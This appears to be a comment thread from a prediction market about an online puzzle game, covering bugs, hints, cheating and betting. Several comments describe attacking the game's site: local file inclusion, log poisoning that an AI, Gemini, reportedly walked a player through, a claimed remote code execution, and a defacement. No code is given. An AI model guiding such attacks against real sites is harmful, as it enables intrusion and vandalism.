@retr0id Lmao yes, they should batch load replies. Like there should be a 'show older replies' and only load x replies. but I don't expect manifold staff to do dev work just for our niche use case. I'll look into starting a second thread from tomorrow.

The parameter is on the site is vuln to local file inclusion. The ftp log is readable

@Bandors ugh, Gemini was so close last night. It walked me through trying to poison Apache logs, session logs, SMTP logs, and php wrappers. But once it learned FTP was enabled it got tunnel vision about trying to actually upload executable code, as it believed retr0id had done this. ๐คฆ
@Bandors I really liked that it was announced at day's start that hints are forthcoming, that is very nice imo. One small, possible change for your consideration: When everyone will advance from a day and we only do it for fun/learning, you could simply submit a hint on the next day, because some competitors sleep at 00:00 UTC and can only view the task hours after the start. Currently, those not reading from https://folded-three.vercel.app/api/players-status-public probably think I only checked in after the hint was given :( Great day though!
@koadma Good idea. I'll wait to post solution until following day for learning days, and simply reward the players who finish before solution is given.
@LoganTurner fwiw I could have uploaded executable code after achieving RCE, since at the time the .txt files were writable by the www-data user - I could have put php source in them. But I did not!
@koadma to my recollection, they simply changed the background image, the text files, and added a js alert, to all say "hacked by retr0id".

yes, based on yesterday's checkin times only logan and evan did not check in among those who were already checked in yesterday, and on the other hand nikki already did check in (and she did not check in yesterday at this time iirc), so a net one less player compared to yesterday. you probably don't have to be overly afraid of many people failing to solve it (still, one can hope..)

@Bandors I'm getting wrongfully flagged as a cheater, and I found the bug. For some reason, beating the worm challenge submits two challenge completions, one for platform 7 immediately followed by one for platform 8 (without waiting for a response from 7). There's absolutely no guarantee that the call for 7 will finish first, and indeed, I got a response for 8 first, saying it was rejected because I hadn't done 7 yet.
I see others have run into the bug as well, thanks for fixing.

To be clear, I'm not making any accusations about your intentions. The whole point of a dog whistle is that it has plausible deniability, and that most people don't recognize the hidden meaning. But it seems pretty clear to me that it is used by some people as a dog whistle.

@121 Look at my profit history, I took several months off from Manifold after a couple big losses, and came back with a much more sustainably profitable betting strategy (most of the time haha)

A manifested signal showing you that you have been wrong about some beliefs, and more importantly, it did not cause you any real bodily/financial harm aside from a bit of a sting to your ego.
You have been given a signpost and a crossroads. What you want to do and what path you want to take is a choice that only you can make.
Thank you all for being gracious competitors. In closing, cryptography puzzles are bad and go against the conceit of the game, and relatedly straight up cheating should have been punished much more harshly from the start. The end result was a straight majority of players straight up cheating to get past the baroque puzzles.

@Bandors I think most just send the "time taken" request which doesn't ask for the code and checks you in automatically. I cracked the SHA256 hash like a real man.

If a pro cryptography/puzzle solver saw the image, they would probably be able to solve it in ~1-2 minutes

1. Unicorn is not a real animal, but itโs the most recognizable โanimalโ beginning with U. So we take the initials.
2. The initials donโt spell a word, even as an anagram. So they must encode another word.

@retr0id In theory, trade can be mutually beneficial here: The buyer can provide the buyer-seller EV change/2 in mana and as a result, they share the EV loss of the other competitors among themselves as trade profit. In practice, without logically omniscient agents it's probably hard to do it fairly, so I'm unlikely to sell here as well.

@LoganTurner I saw you tried starting your highlight from outside the box, which is what tripped you up. You had to start highlighting just to the left of the first character.

I think I checked in before midnight UTC, but after midnight in my local time, and I'm worried that it might count towards the previous day's checkin or something. (it does show me checked in in-app)
@Quroe It's intentional (For example, if the final two players agreed to a draw or something and split the pot, I can resolve both of them YES).
I think the only advantage of an independent market in this case is that it lets you resolve NO on individuals as they drop out, instead of keeping all the mana hostage until someone has one. Given that no one knows how long this will go on, that seems like a useful feature (even with loans).
I think there's room for both a dependent and an independent version of this market, at least if there's enough demand and someone wants to spend the mana to do that.

Doesn't knowing precisely how the game works and how it's going to change give you an advantage? I hadn't noticed that you were on the players list. It also means that if the site experiences downtime that requires work from you, the site coming back will be perfectly synced with your availability.

Not sure how much dev work I want to put into people doing a little trolling before the event begins. I could add a captcha but like what's the point when registration is ending in a couple days. @LoganTurner Phones are not supported, I hate mobile users, they ruined the internet. Google forced websites to have good mobile support for better SEO. This killed historic platforms such as forums, as forums are for long form discussion and inherently bad for the new SEO algos.

@Bandors That's actually what I did, and I was still confused: I visited the page on my phone, signed up, and part of the not-confirmed message was cut off. The player character was totally off-screen, so I wasn't even sure if I was missing something. That's why I ended up asking you about it.

I propose to form a team of 5-10 individuals using a shared account, with entry fee divided accordingly among the participants. This allows for broader participation and I believe will have some other benefits as well. Please message me if interested in joining my team for more details. EDIT: Teams are not allowed apparently.
@A imho the optimal team size is likely around 2 or 3, I think with more people you get into "I assumed someone else would do it" territory
@Quroe I don't mind if you agree to split winnings. Just make sure people who are teaming all have their own account. Teaming up won't give you an advantage over other players outside of hedging your bet if you get lazy and forget to check in one day.

@retr0id a very intriguing offer! I suppose it could work like us pooling the mana for the ticket and dividing the winnings accordingly, with me playing on our collective behalf. I'm mainly proposing 60 mana because that's approximately the most I emotively feel comfortable having a high probability of losing.
@TheAllMemeingEye It is a +EV proposition for the both of us if we think you have a higher-than-average chance of winning vs the other contestants. And I think that's unlikely if you have less at stake vs other contestants - but I could be convinced otherwise!
